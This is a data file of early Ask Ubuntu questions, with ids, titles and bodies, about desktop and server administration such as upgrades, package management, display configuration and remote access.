1	how to get the `` your battery is broken '' message to go away ?	everytime i turn on my computer , i see a message saying something like : your battery may be old or broken . etc ... i know my battery is not working . how can i make the message go away ?
3	how can i set the software center to install software for non-root users ?	how can i set the software center to allow non-root users to install stuff from the ubuntu repos without having to type in their password ? i 'm fully aware of the security implications , and i am willing to take the risk . fedora 12 shipped with something like this . ( by modifying the policykit configuration , i believe )
5	what are some alternatives to upgrading without using the standard upgrade system ?	what are some alternatives to upgrading without using the standard upgrade system ? suppose for example that i wanted to upgrade an ubuntu installation on a machine with a poor internet connection . what would my options be ? could i just use a standard ubuntu disk to upgrade this machine ? if i already have a standard ubuntu disk and want to use that , could i do a clean install without wiping data ?
6	how to set up a headless server ?	i have a ubuntu development server at work . it is an old rack server that is located somewhere in the company 's dungeon , where nobody ever goes . the only way it can work is as a so-called headless server ( i.e . with no monitor/keyboard connected and only accepting network connections ) . obviously , if you just need terminal access ssh is more than enough . i , however , would also like to connect to the graphical interface from time to time . at the moment i am using the built in vnc functionality but i am pretty sure this is neither the most efficient nor the most secure way of approaching this issue . i have done a bit of research on the issue but failed to come to any definite conclusions . i read about trying to forward the x environment over ssh , which would at least solve my security concerns . can anyone share their experiences in setting this up ? is there any other way that might be worth looking at ? i almost exclusively connect to this server from a windows machine . i do n't know if that might be a problem for some of the methods suggested .
7	how do i run a successful ubuntu hour ?	i 'm taking my be-stickered laptop to a coffee shop tonight for an ubuntu hour . i 've let a bunch of local lug people know about it . how can i ensure people come away from it feeling like the experience was valuable ? is there something you 've done that was particularly successful ? there is a wiki page about ubuntu hours which is very helpful . i 'm interested in collecting best practices from the community .
8	how do i go back to kde splash / login after installing xfce ?	i started with ubuntu karmic , and wanted to try kde . so i installed kubuntu-desktop . then i wanted to see how xfce progressed , so i installed xfce4 . i now have kubuntu with an xfce splash and login . how do i ( safely ) purge xfce and just have the kubuntu splash / login screen , or am i stuck with frank-en-buntu ?
9	how do i enable automatic updates ?	update manager is constantly offering me updates ( e.g . security fixes , updates from ppas ) . how can i tell my ubuntu installation to automatically download and install updates whenever they become available ?
11	how do i install adobe flash player ?	i have had significant problems with watching flash video in 64-bit ubuntu . does anyone know of a good way to get flash running on the platform ?
14	how can i make ubuntu check for updates less often ?	i 'd like to have ubuntu not check for updates as often . how do i accomplish this ?
15	what might prevent mouse movements between xrandr screens ?	i 've followed the steps outlined in this howto . right after i log in to gnome i can move the mouse back and forth but as soon as the task bar loads , the mouse becomes jailed in the screen its in ( ca n't move between screens ) . this is my xorg.conf : section `` serverlayout '' identifier `` layout0 '' screen 0 `` displaylinkscreen '' 0 0 screen 1 `` screen0 '' leftof `` displaylinkscreen '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' # could not get this to work it has to be disable endsection section `` files '' modulepath `` /usr/local/lib/xorg/modules/drivers '' modulepath `` /usr/lib/xorg/modules/drivers '' modulepath `` /usr/local/lib '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` dbe '' load `` dri '' load `` dri2 '' load `` extmod '' load `` glx '' load `` record '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' # option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` swcursor '' # [ < bool > ] # option `` colorkey '' # < i > # option `` cachelines '' # < i > # option `` dac6bit '' # [ < bool > ] # option `` dri '' # [ < bool > ] # option `` noddc '' # [ < bool > ] # option `` showcache '' # [ < bool > ] # option `` xvmcsurfaces '' # < i > # option `` pageflip '' # [ < bool > ] identifier `` card0 '' driver `` intel '' vendorname `` intel corporation '' boardname `` core processor integrated graphics controller '' busid `` pci:0:2:0 '' option `` dpms '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb0 '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 24 modes `` 1920x1200 '' `` 1920x1080 '' `` 1680x1050 '' `` 1600x1200 '' `` 1440x900 '' `` 1366x768 '' `` 1280x1024 '' `` 1280x960 '' `` 1280x800 '' `` 1280x768 '' `` 1152x864 '' `` 1024x768 '' `` 800x600 '' `` 640x480 '' endsubsection endsection any help would be appreciated . i 'm so close to getting this to work !
16	where should i install sagemath ?	sage 's installation instructions basically tell me to just untar it and run it from wherever i 'd like . not being experienced with the linux way of where things should go in the filesystem , i 'm kind of at a loss where i should best put it . putting it somewhere in my home directory feels wrong . where would you extract it to ? /opt ?
24	remove online status menu , but keep the logout menu ?	in the upper right panel there is by default a drop down menu where you can set your online status , interact with ubuntu one , etc . it is placed right next to the drop down menu which lets you logout , reboot , shutdown etc . for me personally i have no use for the online status menu , so i usually remove it . the problem is that it seems to belong to the same panel applet as the actually wanted logout menu , since that menu too disappears . i believe we are talking about the `` indicator applet session '' . is there some way i can hide or disable the online status menu , but still keep the neighboring logout menu ? i am running ubuntu 10.04 .
28	sane path to distribution upgrades	i 'm using hardy ( server ) on quite a few machines and i 'd like to upgrade to the latest lts . is it safe to edit my sources.list file to just point to the new lts , or should i do a succession of dist upgrades until i reach the latest lts ?
33	what is the easiest way to strip a desktop edition to a server edition ?	we have installed ubuntu desktop edition on our development server . now that we have it in a data center we would like to strip it down to a server edition . is there an easy way of doing so rather than just going in and uninstalling packages by hand ?
34	what 's the easiest way to set up a lamp stack ?	i set up a new vps instance of ubuntu and am wondering what the easiest way is to get up and running with a basic lamp stack ( i.e . which packages are required , which configuration options need to be tweaked , if any , etc . ) .
36	what is the performance loss if you run an ubuntu desktop edition for a server machine ?	hello we have installed an ubuntu desktop edition on our dev server . i was wondering if there is any noticeable performance loss compared to the server edition .
37	when installing i 'm given the option of encrypting my home folder -- what does this do ?	does encrypting my home folder make my computer more secure ? do i have to enter my password more if my home folder is encrypted ? what else should i know about encrypting my home folder ?
38	how to configure mail server to report a hostname distinct from server name	i have a vps set up with ubuntu 10.04 running exim4 as the mta . the machine name itself is something easily recognizable to us ( in this case , 'fermat ' ) , but the machine itself is responsible for serving up one of our domains ( i.e . www.example.com ) . when generating an email from exim , the email headers are reporting the server name ( fermat ) instead of the domain name ( example.com ) . is there a way to 'force ' exim to report the server name as example.com without changing the machine 's host name ?
41	resetting gnome panel	how does one reset the gnome panel to the initial state ? during use , gnome panel applets move and get replaced with the ones users like . after some time the panel becomes so cluttered that it requires a cleanup . the easiest way would be to reset the panel to the original state that it was in after install . is there an easy way of doing that ?
47	kate keeps forgetting i have the shell plug-in enabled	i 'm using kubuntu ( karmic ) and kate is my favorite editor . i do n't enable many plug-ins , but i really like the inline shell . the problem is , across re-starts , kate seems to forget that i enabled this plug-in . i 've checked across all sessions and the behavior is the same . is there some easy way to fix this ?
50	how do i change how long notifications are displayed ?	is there a way to change how long the libnotify notifications last ? i 've googled around for this for months and no still no luck . i 'm actually starting to think that you ca n't change it . i ca n't even find anywhere in the api where developers can control this .
51	how to log out if the session applet is missing from the top panel ?	for some reason , sometimes when i log in the top panel applets appear garbled . for instance the session applet is missing its icon , and the current username is repeated twice . this does n't happen very often , but when it does the session applet is not responsive so i ca n't get to the log out menu option . is there any other way to log off the current user other than using the ( non working ) session applet ?
53	how do i submit wallpapers to be considered for inclusion in ubuntu ?	i take photos from time to time , and if i take an exceptionally beautiful one , i 'd like to submit it for inclusion in ubuntu . where do i send/upload it ?
56	going from a shared nfs /home to a full ldap solution	i recently deployed about a dozen ubuntu ( karmic ) desktops in a small office . everything was going great , but storage became an issue . i then moved /home to an nfs mount which solved the immediate problem . months later , i 'm regretting this . the company is extremely disorganized with high turnover , people never stay at the same desk for long and now i have 12 machines that anyone needs to access at any given time . this gets crazy with conflicting uid/gid 's as well . i 'd like to just use ldap and make the problem go away . the issue is , they want to be self sufficient , so i need some ( easy ) way for the office administrator to manage users . preferably something gui driven and simple/intuitive to use . what are my options ?
58	indicator applet : how to get rid of the clock ?	there is currently 2 clocks on my panel , one in the `` indicator applet '' , and one in the `` clock '' . the one in the `` indicator applet '' is redundant , and is n't as good as the `` clock '' . does anyone know how to get rid of the clock in the `` indicator applet '' ?
61	how can i make empathy retry connecting when it has a network problem	i have added empathy to the list of applications that open by default , and it 's configured to auto-connect to msn when started , but when i login to my laptop the wifi connection takes a few seconds to be ready . before the net is up , empathy has already started , tried to login to msn and failed , and i ca n't get it to connect after that . this seems to be a bug in empathy , but how can i get a fix for it , or if not possible , how can i delay its start until the network is up ?
66	upgrade experiences from 8.04 lts to 10.04 lts ?	i am running 8.04 desktop as a server and hosting my own web server , has anyone experienced any issues with upgrade from 8.04 to 10.04 ?
67	how do i enable full-color support in vim ?	i have a lovely vim colorscheme ( xoria256 ) and it looks brilliant in gvim , but when i use normal vim in terminal , the colorscheme is only partially supported -- for example , the default semi-transparent aubergine background color is used . how do i make terminal faithfully render my vim colorscheme ?
69	keeping multiple workstations in sync	i work with multiple computers for various reasons . i want to keep those computers in sync configuration wise . i already have a vcs based setup that allows me to manually update configurations on multiple hosts . but i 'm looking for a way to do this automatically . what i 'm looking for is : a way to sync configuration ( vim , ssh , evolution ) keeping certain directories in sync ( like ~/documents ) this is all user configuration and not system configuration . at times the workstation can be offline or behind a slow link , so being able to detect that and act accordingly is a plus .
72	how can i prevent myself from getting logged out automatically in a multi-user setup ?	i am using my machine with multiple accounts logged in at the same time . i am using kdm desktop manager and kde desktop . ever since i upgraded to karmic , when using one user the second user , who is active on another virtual terminal , gets logged out automatically . i have looked through the logs and ca n't find anything that would cause this . what should i be looking into to figure it out ? is there some sort of feature that was turned on through the upgrades ? ( the machine has been through many releases.. ) .
76	what 's the difference between package managers ?	i know ubuntu/kubuntu has several programs that can be used to install packages , such as apt-get , aptitude , and synaptic ( and perhaps others ) . what are the differences between them , and which one is the recommended choice for normal day-to-day package management ? this is a basic question , but i think it 'd be good information to have on the site , and besides i am relatively new to ubuntu so i could use an expert explanation .
80	how can i get gmail notification in my indicator applet ( without leaving evolution open ) ?	i 'd like to have a gmail notification service in my epiphany indicator applet , without leaving evolution open in the background all the time . right now i only get notifications if evolution is open . strangely , this is not the case with google calendars in evolution -- evolution can be closed yet i still get applet notifications through the clock/calendar applet .
82	how to rollback to php 5.2 ?	i have just installed a 10.04 lts on my development server but the system that i need to run on it ( magento ecommerce ) is not compatible with php 5.3 which ships with the newest version of ubuntu . is there a safe and upgrade-proof way of getting php 5.2 installed or will it be easier to use an older version of ubuntu ?
83	how do file permissions work ?	can you explain briefly the main concepts and command line tools used to manage file permissions ?
86	how do i create an ubuntu live usb using a mac ?	i 'd like to create a live usb stick on a mac so i can install ubuntu on another machine . how do accomplish this ?
93	ubuntu and interactive media installations	i 'd like to create an interactive media experience powered by ubuntu , incorporating projected video , music , and assorted strange input devices . has anyone used ubuntu to orchestrate something like this ? can you recommend any specific software/hardware ?
94	is there a system-wide equalizer for pulseaudio or alsa ?	i often want to tweak the sound quality , but have found no other way than to install plugins for each piece of software . unfortunately this is not available for all the apps i use , e.g . spotify . is there a way to install a system-wide equalizer on ubuntu ?
95	completely remove ruby + rails + gems ?	i have messed up my ruby dev environment on ubuntu 10.04 . i need to install ruby this time using rvm . what is the best possible way to remove : ruby all gems rubygems from my machine , so that i can start fresh with rvm ?
96	is there a way to reset all packages/sources and start from scratch ?	i have been playing with package management by adding sources from older ubuntu releases in order to get older versions of some software ( e.g . php ) . unfortunately at some point i must have overdid it as now every attempt to use apt-get or synaptic ends in an error message being displayed saying that there is no candidate available to install . i would like to start fresh - remove all the installed packages and added sources . is there a quick way to do this , or do i need to reinstall the os ?
99	will haskell platform be available in 10.10 ?	i 've been waiting for a couple years to be able to do an apt-get install haskell-platform on ubuntu . will a haskell platform-package be available on ubuntu 10.10 ?
100	sound comes out of my speakers even when headphones are plugged in	i was rocking out to a crazy remix with my headphones plugged in , and someone sitting next to me informed me that the music was also coming out of my speakers . how do i make it so that when i plug headphones in , my speakers turn off ?
108	how can i best retest a bug in a newer or development release ?	i have reported a bug that occurs in karmic on launchpad , and i have been asked to re-test it on lucid or maverick . how can i do this best ?
111	gui for iptables ?	i would like to secure my server and it seems that iptables is one of the first steps . unfortunately editing the rules in a terminal is a bit complicated and dangerous ( those who ever did an iptables -f will know what i mean ; ) ) . could you recommend any good graphical interfaces for managing my iptables rules ?
112	is there a identd-like package in ubuntu that supports ipv6 ?	of those identd daemons available in ubuntu 10.04 , can any of them be made to work with ipv6 ? if so , a nudge in the right direction regarding how to configure the ipv6 support would be nice .
116	how do i get and install more themes , icons , and pointers ?	i 've downloaded some nice themes , icon packages , and pointers from sites like gnome-look . now what do i do ? where else can i get these kinds of things ?
120	how do i avoid the `` s to skip '' message on boot ?	after upgrading my laptop from karmic to lucid , my fat32 partition wo n't mount automatically . i get the message : the disk drive for /osshare is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery funny thing is , if i skip , then /osshare/ is mounted once i log in . i 've a similar setup on my desktop , and it works fine . fstab on desktop : uuid=4663-6853 /osshare vfat utf8 , umask=007 , gid=46 0 1 /etc/fstab on laptop : uuid=1234-5678 /osshare vfat utf8 , auto , rw , user 0 0
127	how do i get involved with testing and qa with ubuntu ?	i 'd like to get involved with ubuntu qa by creating automated tests . is there an ongoing effort to create these tests ? where can i learn more ?
128	what are the multi-touch netbooks/tablets that work with ubuntu ?	i will be going to university soon and am looking for a tablet/netbook on which i can use a stylus to write notes ( chinese characters mostly ) . i have only found 2 netbooks ( with swivel screens and full keyboards ) that might work for me . one is the asus eee pc t101mt , and the other is a gigabyte touchnote . does anyone know of tablets ( keyboardless ) that ubuntu fully works on ?
131	which computers are guaranteed to work ?	before i buy my next laptop , i 'd like to make sure that it will work perfectly with ubuntu . is there a list of completely supported computers anywhere ?
134	how do i create a desktop wallpaper slideshow ?	how do i create a desktop wallpaper slideshow with my own set of images ? with the images coming from a pictures folder , or pre-selected with the images displayed in order , or randomly with the images changing every few minutes , or after random periods of time
142	is there a paint.net alternative ?	does anyone know of a simple image editor , with functionality comparable to paint.net , for ubuntu ? i 've always found gimp to be overkill and too complicated for what i want to do .
152	is there split pane support in gedit ?	i know some other text editors like notepad++ enable split pane to edit to files side by side . is there any way i can add this functionality to gedit ?
154	is there a gnome applet for imap mail accounts ?	in the spirit of this question : is there an applet that will notify me of new messages in an imap mail account . ( not a gmail account )
158	is there a simple guide for how to set up a demo cloud ?	i would like to be able to demo a uec cloud at a presentation . is there a simple guide regarding the hardware i need , and how i need to configure the uec in order to create a nice presentation ?
164	how can i tell , from the command line , whether the machine requires a reboot ?	when you install certain updates ( e.g . a new kernel ) in ubuntu desktop , you get an indication that a reboot is required ( in lucid , the logout icon turns red ) . how can i check , from the command line , whether an ubuntu server requires a reboot ? i could grep for 'system restart required ' in /etc/motd , but i 'd like a solution that 's more elegant . also , i want a solution that works in older releases , e.g . hardy ( 8.04 lts ) .
167	how do i put a package into the ubuntu repositories ?	i 've created a python application for ubuntu . how do i package it and submit it for possible inclusion in the universe repository ?
174	where can i find f # packages ?	i 'm currently install f # manually by downloading the binary distribution from microsoft , downloading the mono key , running the mono installer , then fiddling with my path . is there a ppa with f # packages that can make my life easier ?
181	how to burn a dual layer dvd iso from the command line	how do you burn a dvd-dl iso from the command line ?
182	firmware update for ipod touch ( iphone ) ?	i need to update firmware of my ipodtouch ( iphone ) in ubuntu and as i have jailbroken ipod touch i need itunes to install apps , but unfortunately have n't found any ways to do that in ubuntu yet . i know that it is possible to use virtualbox or wine , but still in the most of the times itunes does n't want to work on wine and for virtualbox i need to install again that windows from which i switched into ubuntu just a few months ago and do n't want to go back to it . what do linux users who have ipod touch ( iphone ) do in this case ? any suggestions to solve the problem will be pleased . and finally , how long will it be before apple develops itunes for linux os ? thanks a lot .
193	how can i change the login screen theme in gdm ?	how can i change the login screen theme ? is there a graphical way or no ?
194	how can i install just security updates from the command line ?	sudo apt-get upgrade installs all updates , not just security updates . i know that i can use update manager to select only important security updates , but is there a way to do this from the command line ?
198	what video players do you recommend ?	what video players do you recommend for ubuntu . is there any video player that supports good playback of 720p videos in oldish hardware ?
205	where can i find documentation on the /etc/environment file format ?	from system-wide environment variables : /etc/environment - this file is specifically meant for system-wide environment variable settings . it is not a script file , but rather consists of assignment expressions , one per line . specifically , this file stores the system-wide locale and path settings . i 'm looking for an abnf and/or a more detailed description of behaviour , or anything that is n't forum hearsay really . if it 's on google , it 's eluding me .
209	what are the advantages and disadvantages of different docks ?	for example : avant window navigator , docky , dockbarx and cairo dock .
212	where can i find the brother hl-2170w 64-bit printer driver ?	i 'm looking to install drivers for my `` brother hl-2170w '' network printer . i ca n't seem to find the correct driver on the brother site . any help would be appreciated . i 'm running on ubuntu 10.04.1 lts x86_64 .
218	command to list services that start on startup ?	is there a command to list services that run on startup ? i imagine it would involve parsing /etc/init.d/ , and the various /etc/rc . * directories .
219	under what license is ubuntu ? can it be legally modified and distributed ?	what license does ubuntu fall into ( gpl , mit , a mix ) ? would it be legal to modify it and redistribute my modified version ?
221	how to force installation of kernel updates when using apt-get upgrade ?	to update my server i use apt-get upgrade . but when there are kernel updates i always need to do apt-get install linux- ... . because apt-get update does not install them . is there a way i can tell it to install those too ? i tried -f but it does not work .
224	how to i move mysql data files onto different partition ?	i have my hard drive partitioned with two partitions , so i can easily re-install ubuntu and try out different versions without losing my home directory data . it is setup like this : 20gb - > / ( root ) 180gb - > /home i do a lot of development work , so i have my /var/www folder symlinking to /home/valorin/workspace . but i want to do this with my mysql data files as well , as i am getting annoyed that each time i reinstall my machine i need to do a full sqldump and then restore all the db 's before i can do more work . what is the best way to do this without breaking mysql ?
226	what does the ubuntu firefox modifications extension to firefox do ?	i 'm presently running firefox 3.6.8 on ubuntu 9.04 . my firefox extensions include ubuntu firefox modifications 0.9rc2 . i 've upgraded firefox on this install a few times ; as far as i can recall , some version of this extension was present when i initially installed ubuntu 9.04 . i have disabled it , mostly because i did n't know what it provided me , nor was i able to find out when i tried a bit . what does the extension do ?
228	how to set ubuntu to synchronize my clock with a time server ?	i would like ubuntu to automatically synchronize my system clock with a timeserver at startup . however , my pc is n't connected to the internet until after i 've logged in ( plus 5 - 10 seconds for good measure ) . how can i set it to do this ?
230	install adblock using synaptic or through firefox 's addons menu ?	i want to install adblock for firefox and i see it is in synaptic . should i install it with synaptic or the regular way with the firefox add-on manager ? does it make any differences at all ?
244	what should i set the dpi to for my 13 '' macbook pro ?	i have installed ubuntu on my new 13.3 inch 1280x800 macbook pro . it works great , but the fonts are kinda differently sized from the mac programs , and i am wondering if i need to change the dpi . looking at the apple site does n't tell me the dpi that this computer is .
247	what 's your recommendation on drive partitioning schemes for a desktop and home server ?	what partitioning scheme do you recommend for a desktop ? i 've always created three or four primary partitions -- root , swap , home , and sometimes a separate boot partition . ubuntu 's default install offers lvms . i 've never had to add additional drives or space , so it never seemed like a big deal . whenever i do a fresh install , though , i always think there might be a better way .
248	how can i show or hide boot messages when ubuntu starts ?	is there a way to easily turn on/off showing the boot messages ( loading the services ) when ubuntu starts ? is it something in grub2 ? i am running lucid .
249	how can i sync music with my iphone 3g ?	what is the best way to sync music with my iphone 3g ?
253	is there a working upnp client/server combo ?	i have videos stored on one machine ; i 'd like to watch them on another machine . both are running ubuntu 10.04 64-bit . so far i 've tried mediatomb , mythtv , and python-coherence . none of the clients seem to see the servers and i definitely have connectivity between the client and server machines ( so it 's not a network issue ) .
256	does ubuntu have support for the trim command for use with ssd ?	ssd drives need to be `` cleared/reset '' after the drive fills up to maintain performance . this is done through the trim command for new ssd drives . does ubuntu support the trim command ( through hdparm etc ) for clearing/resetting of these drives ?
261	how are applications selected as defaults ?	whenever i install ubuntu there are certain applications i automatically install , instead of using ubuntu 's default ( vlc comes to mind ) . my question is about how some software is chosen over others to a . is it by the community ? is there a committee ?
270	how do i get a patch applied to a package , when the upstream maintainer does not seem active ?	i know of bugs where there is a fix available , which has been posted upstream . however , the upstream maintainer has n't responded to the patch , or applied it to the project 's source code . would it be suitable to submit the fix for inclusion in ubuntu , and if so , would i go about doing this ?
276	why does my kubuntu session take considerable time before responding after resume ?	i have a dell xps m1330 running kubuntu 10.04 . when i resume from suspend , i get the blank lockscreen i set up , but i ca n't move my mouse , it 's in the upper left hand corner of the screen . the computer takes some time , some toaster notifications flash ( above the screensaver for a second , then hiding ) i hear the `` welcome back '' tones . i can move my mouse and log in . this whole process can take anywhere between 15 and 45 seconds . is there a way to figure out what is causing this delay , and to hopefully resolve it ?
277	how can i save my favourites in knr search and launch page ?	using lucid kubunu network release , every time i reboot some of my favourites are missing . do i have to log out in order to save them ? how can i do that without logging out ?
278	how do i access an encrypted home folder from a dual-boot machine ?	( this might not be an ubuntu-specific question ? ) when i installed 9.10 , i opted to encrypt my home folder using ecryptfs , but then i discovered this locked me out of my ext3 partition when i tried to access it from windows on my dual-boot machine ( using some free ext2/3 driver that i got somewhere , not even sure which one ) . is there a way to mount an encrypted home folder in windows ?
279	what guidelines should one follow when customizing their install in order to maintain an upgrade path ?	in the past , i 've gone hog wild customizing my ubuntu installation , only to be unable to upgrade it once the time came . so how does one go about customizing their install without running into issues upgrading ? is it possible to do so without relying solely on the ubuntu repositories for software ?
280	help getting the flash player working on second screen ?	i have a dual screen setup . i have a notebook lcd and a 17 '' monitor plugged into the vga port on the notebook . i have a geforce 8400m gs video card with the nvidia 195.36.24 kernel module installed . i also have compiz installed and enabled . here is the problem : when i try to view a webpage that uses the flash player , the control is empty . for controls that play sound , i can actually hear the sound , but i ca n't see anything . it works fine on the primary ( lcd ) monitor . oh , and i 'm using ubuntu 10.04 64-bit .
282	netbook edition battery life - ubuntu vs. kubuntu ?	i 've been running unr on my eee 1000 pretty much since it came out over a year ago ( i was using easy-peasy before that ) , but i 'm curious about the new kubuntu netbook edition . ultimately , kde is better looking , and has some really friendly software , but i 'm worried about performance - that display has got to be a processor hog ( and by association , battery ! ) , no ? how much does kubuntu netbook edition impact battery life ?
283	does installing packages manually with dpkg prevent a future upgrade path ?	i manage a private network which has no internet connectivity due to the security policy of the customer . this network has a single ubuntu 10.04 lts server installation ( soon to be several more ) and i 've been trying to customise it with software - however , i 'm having to manually install packages with dpkg because of the lack of internet connectivity . does this prevent me from upgrading to a newer version of ubuntu server ( lts ) when it becomes available , since the packags i 've installed are n't ont he current distribution cd , they 're unlikely to be on the newer releases also .
287	panel applet to show current network traffic in text ?	i 'm using the system monitor panel applet to show me graphs of current ram usage and network traffic . however , i want something like istat menu 's text version of this . if i hover over my current app , it shows that instant 's traffic , but does not update . is there something that will display a number ( not graph ) of real-time network traffic ?
292	how do i get vim to keep its undo history ?	if i 'm editing two files with vim , changing to the other file ( : bnext , : bprev ) seems to drop the undo history from the open file - hitting the 'u ' key reports `` already at oldest change '' . for example : vim testfile1 testfile2 add some stuff to testfile1 : w : bn : bp u eep ! ca n't undo ! is there any way to keep this history for non-visible buffers ?
297	backup bash script is not gzipping its tarball	i have a bash script that runs as a cron to backup files on the server . # ! /bin/bash file=/path/to/backup_ $ ( date + % y % m % d ) .tar tar -cf $ file /backup/this /and/that /and/someotherfiles gzip $ file when i run the script directly using : sudo bash ./backup-files.sh it gzips the file , but last night when the cron ran it left it as a tar . would the cron have saved a log somewhere that 'd point to why this may be the case ?
304	photo management with video support	f-spot is great , but does not have video support . picasa is arguably even better , but although mov support is possible , avi and mpeg support is unavailable . is there a photo management app that can also work with videos ? thanks
305	why was f-spot replaced with shotwell in ubuntu 10.10 ?	what are the advantages of using shotwell ? what are the disadvantages ?
307	how can ppas be removed ?	i 've added many ppas using the add-apt-repository command . is there a simple way to remove these ppas ? i 've checked in /etc/apt/sources.list for the appropriate deb lines but they are n't there . this is on a server system so a command line solution would be great !
312	upgrading ubuntu server 9.10 to 10.04	a quick google found this page about how to upgrade but my question is how do i make sure all configurations remain intact ( samba , apache , svn ) and also , is it worth it to upgrade ? will 9.10 continue to have bugfixes/security updates and the like released to it via the package managers ?
315	is there something like trixbox ce for ubuntu server ?	in an effort to keep things consistent , i 've been slowly but surely replacing centos and *bsd servers with ubuntu lucid . i 've come across a few that i 'll have problems migrating , in particular several trixbox ce servers that are based on centos . we 'd like to bring everything we have under one management roof , either by using landscape or something similar that we nail together in house . is there something like trixbox that will work on ubuntu ? either asterisk or freeswitch , preferably pre-packaged by a vendor in .deb format ? i dug through launchpad ppa 's in hopes of finding a port of either , but i did not find anything . any suggestions ?
320	how do i create my own php 5.3.3 package/ppa ?	i really would like to create a package for php 5.3.3 and then make a ppa for it ( i would like the php-fpm support but inside the newest release ) , however this question goes further than this . i would like to be hand walked through the whole process of compiling and packaging for ubuntu as i do have an intrest in the whole motu project but i feel a little bit out of my depth at the moment .
324	strange behavior of flash in google chrome	i have the last version of chrome 5.0.xx . and my ubuntu is also of the last version 10.04 . what i usually do is to open two instances of chrome and divide the screen into two parts . in one part my son watches cartoons in youtube and in the other part i just read some news . so , sometimes , when i close some pages of the news i have being read the video which was being played in youtube crashes and immediately stops . i need to refresh youtube page and see the video again . what is the problem ? how to solve it
326	is it safe to remove completely keyrings from ubuntu ?	to be honest i did n't like how keyrings work in ubuntu and removed them completely . is my action safe and wo n't it harm any part of the system ?
327	what do windows ' users like most after migrating into ubuntu ?	this question is not deleted because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . more information : http : //askubuntu.com/faq the title says for itself . there are a lot of interesting new features in ubuntu . for example , after migrating into ubuntu the most interesting feature for me was centralized application installation via synaptic ( users do not need to search for an application , download it from somewhere , install it , and if it is pirated software to search keygens and stuffs like that ) . what else could be added to the list ?
339	how can i install a package without root access ?	i have no root access on this machine . i would like to know if there is a way i can download ubuntu packages and install them as non-root ? probably in my ~/bin or ~/usr/share or something like that ? would that work ?
343	alternative for mac os x automator ?	i once tested mac os x and something that called my atention was automator , a software to visually create scripts to automatize tasks on the desktop . is there any linux alternative for this software ?
348	how do i install pyjamas ?	when ubuntu 10.4 was in alpha stage , there was pyjamas package , which did n't work . i posted a bug on launchpad and the only resolution , was removing this package altogether . does anyone know , how to easily install pyjamas on ubuntu 10.4 ? i tried downloading debs from debian repositories , but there were some broken dependencies .
352	what is the best remote desktop tool to connect to windows from ubuntu ?	i 've used rdesktop in the past . is there something better ?
353	how do i move the window buttons back to the right for all users ?	i know i can edit gconf to move the [ minimize , maximize , close ] buttons back to the right-hand side , but is there a way to do this for all users ? ideally at install time so i do n't have to explain this to every user every time i set up a new machine .
358	how can i type accentuated characters like ăť ?	currently i use the character palette applet in gnome panel to put special characters into text . this is okay , but i have to stop typing , select the character i want from the applet and then copy and paste . is there a way to simply type special characters with different key combinations ? if so , how do i do it ?
365	is it possible to tell what packages i 've installed that are n't in the vanilla install ?	i 've upgraded ubuntu on my laptop all the way from 7.04 to 10.04 without ever wiping the disk . i have a sneaking suspicion that means i have a bunch of crufty packages that i do n't use and that are just taking up disk . is there any way to get a list of all the packages included that are beyond the base install ?
367	stopping the menu icon flicker	every time i click on the application or system menus , i notice that no icons show up for a second , then they page in . is there some way to explicitly tell ubuntu to cache this ? my suse ( gnome ) desktop does n't have this problem , but i do n't know whether that 's because they 're doing something custom , or because it 's a setting i 'm missing .
369	when to use packages in aptitude versus cpan/gems/pypi ?	what 's the general rule for when to install a package from the official .deb repositories , versus when to install with the language 's package manager ? the ones in the upstream repositories are frequently at least slightly out-of-date , but i also do n't want to have my packages colliding with the `` official '' ones , and it seems that aptitude is going to force me to install the official ones in many cases anyway .
370	is there an equivalent to windows remote assistance/ichat screen sharing ?	i 'm used to being able to help my parents through ichat screen sharing on os x and remote assistance on windows . is there something that has the same workflow ( no setup , works through nats and firewalls ) available for ubuntu ? i 'd be very nervous about migrating them to ubuntu without the ability to help them remotely .
374	why do my clock , indicator applets , and notification area sometimes move around when i restart ? how can i prevent that ?	i have all of them locked to the panel , but they keep moving around upon logging out and back in . so , for example , sometimes the indicator applet session is farthest to the right , but sometimes the clock/calendar is , and occasionally the notification area is . this is a small issue , but annoying .
375	how can i change/customize the icons in my notification area ?	currently , i can change themes and icons through the appearance dialog , but this leaves things like the skype , dropbox , and firestarter icons in the notification area unchanged . where are these stored ? how do i change them ?
